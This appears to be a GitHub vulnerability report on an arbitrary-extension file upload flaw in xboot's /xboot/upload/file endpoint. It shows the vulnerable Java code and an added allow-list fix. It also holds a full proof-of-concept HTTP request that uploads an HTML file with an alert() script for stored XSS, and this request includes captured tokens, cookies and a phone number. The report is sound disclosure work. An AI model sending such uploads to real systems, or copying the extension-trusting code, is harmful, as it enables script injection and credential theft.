
Unrestricted Upload of File with Dangerous Type (CWE-434) /xboot/upload/file

Open NinjaGPT opened this issue 5 months ago • 0 comments

Summary

The endpoint "/xboot/upload/file" allows attackers to upload malicious files with arbitrary extensions, potentially creating attack vectors for stored Cross-Site Scripting (XSS) or even Remote Code Execution (RCE) attacks.

Details

  • xboot-fast/src/main/java/cn/exrick/xboot/modules/base/controller/common/UploadController.java
@Slf4j
@RestController
@Api(tags = "文件上传接口")
@RequestMapping("/xboot/upload")
@Transactional
public class UploadController {

    @Value("${xboot.maxUploadFile}")
    private Integer maxUploadFile;

    @Autowired
    private QiniuUtil qiniuUtil;

    @RequestMapping(value = "/file", method = RequestMethod.POST)
    @ApiOperation(value = "文件上传")
    public Result<Object> upload(@RequestParam(required = false) MultipartFile file,
                                 @RequestParam(required = false) String base64) {

        if (file.getSize() > maxUploadFile * 1024 * 1024) {
            return ResultUtil.error("文件大小过大,不能超过" + maxUploadFile + "MB");
        }
        if (StrUtil.isNotBlank(base64)) {
            // base64 upload
            file = Base64DecodeMultipartFile.base64Convert(base64);
        }
        String result;
        String fileName = CommonUtil.renamePic(file.getOriginalFilename());
        try {
            InputStream inputStream = file.getInputStream();
            // upload to the Qiniu cloud server
            result = qiniuUtil.qiniuInputStreamUpload(inputStream, fileName);
        } catch (Exception e) {
            log.error(e.toString());
            return ResultUtil.error(e.toString());
        }

        return ResultUtil.data(result);
    }
}
  • xboot-fast/src/main/java/cn/exrick/xboot/common/utils/CommonUtil.java
public static String renamePic(String fileName) {

    String extName = "";
    if (fileName.contains(".")) {
        extName = fileName.substring(fileName.lastIndexOf("."));
    }
    return IdUtil.simpleUUID() + extName;
}
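The fix the report implies is to stop trusting the client-supplied extension: allow-list the extensions the endpoint is meant to accept and verify the file's leading bytes match that type before building the stored name. The following is an added example, not xboot's code; the class and method names (SafeUploadName, safeRename) and the image-only allow-list are assumptions for illustration.

```java
import java.io.IOException;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;

/** Added example (not xboot code): allow-list the extension and check magic bytes before renaming. */
public final class SafeUploadName {

    // Hypothetical allow-list: raster image types only, each with its expected leading bytes.
    private static final Map<String, byte[]> MAGIC = Map.of(
        ".jpg",  new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        ".jpeg", new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        ".png",  new byte[]{(byte) 0x89, 'P', 'N', 'G'},
        ".gif",  new byte[]{'G', 'I', 'F', '8'}
    );

    /** Returns the lower-cased extension if it is allow-listed, otherwise null. */
    static String allowedExtension(String originalName) {
        if (originalName == null) return null;
        // Drop any path component a client may smuggle into the filename.
        String base = originalName.replace('\\', '/');
        base = base.substring(base.lastIndexOf('/') + 1);
        int dot = base.lastIndexOf('.');
        if (dot < 0) return null;
        String ext = base.substring(dot).toLowerCase(Locale.ROOT);
        return MAGIC.containsKey(ext) ? ext : null;
    }

    /** True when the content's leading bytes match the signature expected for ext. */
    static boolean magicMatches(byte[] content, String ext) {
        byte[] expected = MAGIC.get(ext);
        if (expected == null || content == null || content.length < expected.length) return false;
        return Arrays.equals(Arrays.copyOf(content, expected.length), expected);
    }

    /**
     * Replacement for renamePic: random name plus an allow-listed extension that the
     * content actually matches. Rejects anything else instead of storing it.
     */
    public static String safeRename(String originalName, byte[] content) throws IOException {
        String ext = allowedExtension(originalName);
        if (ext == null) throw new IOException("file type not allowed");
        if (!magicMatches(content, ext)) throw new IOException("content does not match extension");
        return UUID.randomUUID().toString().replace("-", "") + ext;
    }
}
```

With this in place the report's xss.html sample is rejected at allowedExtension, and a renamed .html-as-.jpg payload is rejected at magicMatches; the controller would call safeRename(file.getOriginalFilename(), file.getBytes()) in place of CommonUtil.renamePic.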

POC

POST /xboot/upload/file HTTP/1.1
Host: localhost:9999
Content-Length: 231
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
accessToken: 65aa38a0b6034066bd7a080520dde446
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykm1yoRzGFrNZRql9
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:9999
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9999/open/client
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=GA1.1.1119679874.1749601651; CHAT2DB.USER_ID=2; _ga_V8M4E5SF61=GS2.1.s1749601650$o1$g1$t1749601661$j49$l0$h0; PUBLICCMS_ADMIN=1_98929ca2-feeb-4745-8c8b-83ce96a02974; PUBLICCMS_ANALYTICS_ID=3c11ec88-14ff-4a2d-945e-a76277395bfe; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1752119531,1752119879,1752126651,1752126882; cms.locale=zh; Hm_lvt_64e52d9ed8f5acc3eb7d60058e2fb7ab=1753156816; HMACCOUNT=71B59AD17A941F07; userInfo={%22id%22:%22682265633886208%22%2C%22createBy%22:%22%22%2C%22createTime%22:%222018-05-01%2003:13:51%22%2C%22updateBy%22:%22admin%22%2C%22updateTime%22:%222020-04-30%2004:56:32%22%2C%22delFlag%22:0%2C%22username%22:%22admin%22%2C%22password%22:null%2C%22nickname%22:%22%E7%AE%A1%E7%90%86%E5%91%98%22%2C%22mobile%22:%2218782059031%22%2C%22email%22:%[email protected]%22%2C%22address%22:%22%E5%8C%97%E4%BA%AC%E5%B8%82%2C%E5%B8%82%E8%BE%96%E5%8C%BA%2C%E4%B8%9C%E5%9F%8E%E5%8C%BA%22%2C%22street%22:%22%E5%A4%A9%E5%BA%9C1%E8%A1%97%22%2C%22sex%22:%22%E7%94%B7%22%2C%22passStrength%22:%22%E5%BC%B1%22%2C%22avatar%22:%22https://ooo.0o0.ooo/2019/04/28/5cc5a71a6e3b6.png%22%2C%22type%22:1%2C%22status%22:0%2C%22description%22:%22%E6%88%91%E6%98%AF%E5%A4%A7%E5%B8%85%E9%80%BC%22%2C%22departmentId%22:%2240322777781112832%22%2C%22departmentTitle%22:%22%E6%80%BB%E9%83%A8%22%2C%22birth%22:%222020-04-15%22%2C%22defaultRole%22:null}; videoShowed=videoShowed; Hm_lpvt_64e52d9ed8f5acc3eb7d60058e2fb7ab=1753163004
Connection: close

------WebKitFormBoundarykm1yoRzGFrNZRql9
Content-Disposition: form-data; name="file"; filename="xss.html"
Content-Type: image/jpeg

<script>alert("POC confirmed by ZAST");</script>

------WebKitFormBoundarykm1yoRzGFrNZRql9--

Impact

The Stored XSS vulnerability allows attackers to launch attacks via arbitrary JavaScript code execution, such as phishing, stealing users' credentials, etc.

  • Reference: https://portswigger.net/web-security/cross-site-scripting/stored

NinjaGPT avatar Jul 22 '25 12:07 NinjaGPT